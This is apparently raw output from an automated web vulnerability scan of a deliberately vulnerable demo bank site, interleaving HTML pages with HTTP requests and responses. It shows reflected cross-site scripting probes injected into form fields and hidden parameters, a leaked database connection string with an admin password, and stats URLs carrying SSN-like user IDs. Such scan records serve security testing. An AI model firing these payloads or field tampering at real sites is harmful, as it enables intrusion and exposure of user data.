td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /stats/stats.html HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:37 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 17 Jan 2002 04:54:47 GMT
ETag: "2ed27316139fc11:8f6"
Content-Length: 271575
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<FONT FACE="Arial" COLOR="#000000">
<!-- WT_VERSION_2.0 -->
<!-- WT_WINDOW_NAME>Building Summary Report...</WT_WINDOW_NAME -->
<!-- WT_AUTO_EXIT -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_REPORT_TITLE>Webserver Statistics</WT_REPORT_TITLE -->
<!-- WT_CRLF -->
<!-- WT_LOG_TITLE>www.freebank.com</WT_LOG_TITLE -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CENTER><CENTER>Prepared By:</CENTER></WT_CENTER -->
<!-- WT_CRLF -->
<!-- WT_AUTHOR>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_AUTHOR -->
<!-- WT_CRLF -->
<!-- WT_COMPANY>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_COMPANY -->
<!-- WT_CRLF -->
<!-- WT_CENTER><CENTER>on <!-- WT_DATE_TIME --></CENTER></WT_CENTER -->
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- TABLE OF CONTENTS -->
<!-- WT_TOC>Table of Contents</WT_TOC -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_TABLE_OF_CONTENTS -->
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- Start Strip -->
<CENTER><a href="http://www.freebank.com">
<img border=0 src="/images/freebank-logo2.gif" alt="Freebank">
</a></CENTER>
<H1><CENTER><EM><WTHDR>Webserver Statistics</WTHDR></EM></CENTER></H1>
<H2><CENTER>www.freebank.com</CENTER></H2>
<!-- End Strip -->
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><HR><P>
<a name="GeneralStats"><!--General Statistics::General Statistics--></A>
<!-- WT_H1>General Statistics</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF">
<B>General Statistics</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The User Profile by Regions graph identifies the general location of the visitors to your Web site. The General Statistics table includes statistics on the total activity for this web site during the designated time frame. <!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index00.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<!-- ---- ---- -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 3.2, 2.8</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>General Statistics</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>General Statistics</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Date & Time This Report was Generated</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Saturday January 12, 2002 - 21:49:35</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Timeframe</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">09/30/01 19:06:56 - 01/13/02 19:39:41</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Hits for Home Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">0</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Successful Hits for Entire Site</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">63026</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Page Views (Impressions)</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">16990</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of User Sessions</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">10898</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions from United States</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">68.38%</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>International User Sessions</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.01%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions of Unknown Origin</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.59%</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Hits Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">600</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Page Views Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of User Sessions Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average User Session Length</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:08:05</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- ---- ---- -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopDocuments"><!--Resources Accessed::Most Requested Pages--></A>
<!-- WT_H1>Most Requested Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Requested Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular web site pages and how often they were accessed. The average time a user spends viewing a page is also indicated in the table.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index01.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>6, .3, 2.7, .7
, .7
, .8
, .8</WT_TABLE_STATS -->
<CENTER><B>Most Requested Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Requested Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Avg. Time</CENTER></B></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4736</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4305</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:41 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">847</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:04:28 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">804</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">723</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:53 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">732</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">662</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:48 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">629</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:03:34 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">627</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:06:05 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">620</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">597</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:02:30 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">566</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.33%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">506</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:01 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_memorial.htm">http://www.freebank.com/nbf_memorial.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">560</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">517</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:04 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_speeches.htm">http://www.freebank.com/nbf_speeches.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">375</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.2%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">328</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:35 </TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total For the Page Views Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10682</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62.87%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>16990</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBottom"><!--Resources Accessed::Least Requested Pages--></A>
<!-- WT_H1>Least Requested Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Least Requested Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the least popular pages on your Web site, and how often they were accessed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 3.3, .8
, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Least Requested Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Least Requested Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/stats.html">http://www.freebank.com/stats/stats.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/login.asp">http://www.freebank.com/stats/login.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_heading.htm">http://www.freebank.com/nbf_heading.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/robots.txt">http://www.freebank.com/robots.txt</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR>
